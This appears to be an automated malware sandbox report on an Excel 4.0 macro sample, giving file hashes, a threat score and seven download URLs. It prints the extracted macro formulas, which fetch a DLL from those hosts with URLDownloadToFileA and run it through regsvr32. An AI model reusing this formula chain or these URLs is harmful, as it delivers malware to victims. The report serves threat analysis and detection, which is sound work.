General

  • Target

    b907f05c905564ef7e8eed5cbaaeb9104ad0f48f7f0796c16de76081dcadb75d

  • Size

    49KB

  • Sample

    241120-pymyls1pdj

  • MD5

    be65fd6dea8d475432853c459318750b

  • SHA1

    fc96655c970f1a9aecc6cf732be7416e4cbd03ca

  • SHA256

    b907f05c905564ef7e8eed5cbaaeb9104ad0f48f7f0796c16de76081dcadb75d

  • SHA512

    adaaf34a0a3b25bff1596d2c7aab6fa6335c8a356a0c454ce3610e8c8ba9c84b6973aaf60380e57dc6f4554f49efb9f3dbf432855e650150cc14ba0bde9d978c

  • SSDEEP

    1536:gkcEEt24xZdRBzH9hJBrdEwwNXekVIcog:RcEe2Kd3zdtdEwo/z

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://ballpointmedia.com/css/WDvvKlTTncgkazP/

http://www.altoxi.com/UIc/04GtHAQGA/

http://www.apesb.com/language/IgWs7RRV/

http://www.ara-choob.com/data1/Tzm3xsCsT4DScdUFOx/

http://www.techniquesbroadband.net/pay/Bxp/

http://www.arisgears.com/cgi-bin/dkeY/

https://www.manchesterslt.co.uk/a-to-z-of-slt/rNrJKOM2h/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ballpointmedia.com/css/WDvvKlTTncgkazP/","..\ujg.dll",0,0) =IF('EGDGB'!F7<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.altoxi.com/UIc/04GtHAQGA/","..\ujg.dll",0,0)) =IF('EGDGB'!F9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.apesb.com/language/IgWs7RRV/","..\ujg.dll",0,0)) =IF('EGDGB'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ara-choob.com/data1/Tzm3xsCsT4DScdUFOx/","..\ujg.dll",0,0)) =IF('EGDGB'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.techniquesbroadband.net/pay/Bxp/","..\ujg.dll",0,0)) =IF('EGDGB'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.arisgears.com/cgi-bin/dkeY/","..\ujg.dll",0,0)) =IF('EGDGB'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.manchesterslt.co.uk/a-to-z-of-slt/rNrJKOM2h/","..\ujg.dll",0,0)) =IF('EGDGB'!F19<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\ujg.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://ballpointmedia.com/css/WDvvKlTTncgkazP/

xlm40.dropper

http://www.altoxi.com/UIc/04GtHAQGA/

xlm40.dropper

http://www.apesb.com/language/IgWs7RRV/

xlm40.dropper

http://www.ara-choob.com/data1/Tzm3xsCsT4DScdUFOx/

xlm40.dropper

http://www.techniquesbroadband.net/pay/Bxp/

xlm40.dropper

http://www.arisgears.com/cgi-bin/dkeY/

xlm40.dropper

https://www.manchesterslt.co.uk/a-to-z-of-slt/rNrJKOM2h/

Targets

    • Target

      b907f05c905564ef7e8eed5cbaaeb9104ad0f48f7f0796c16de76081dcadb75d

    • Size

      49KB

    • MD5

      be65fd6dea8d475432853c459318750b

    • SHA1

      fc96655c970f1a9aecc6cf732be7416e4cbd03ca

    • SHA256

      b907f05c905564ef7e8eed5cbaaeb9104ad0f48f7f0796c16de76081dcadb75d

    • SHA512

      adaaf34a0a3b25bff1596d2c7aab6fa6335c8a356a0c454ce3610e8c8ba9c84b6973aaf60380e57dc6f4554f49efb9f3dbf432855e650150cc14ba0bde9d978c

    • SSDEEP

      1536:gkcEEt24xZdRBzH9hJBrdEwwNXekVIcog:RcEe2Kd3zdtdEwo/z

    Score
    10/10

MITRE ATT&CK Enterprise v15

Tasks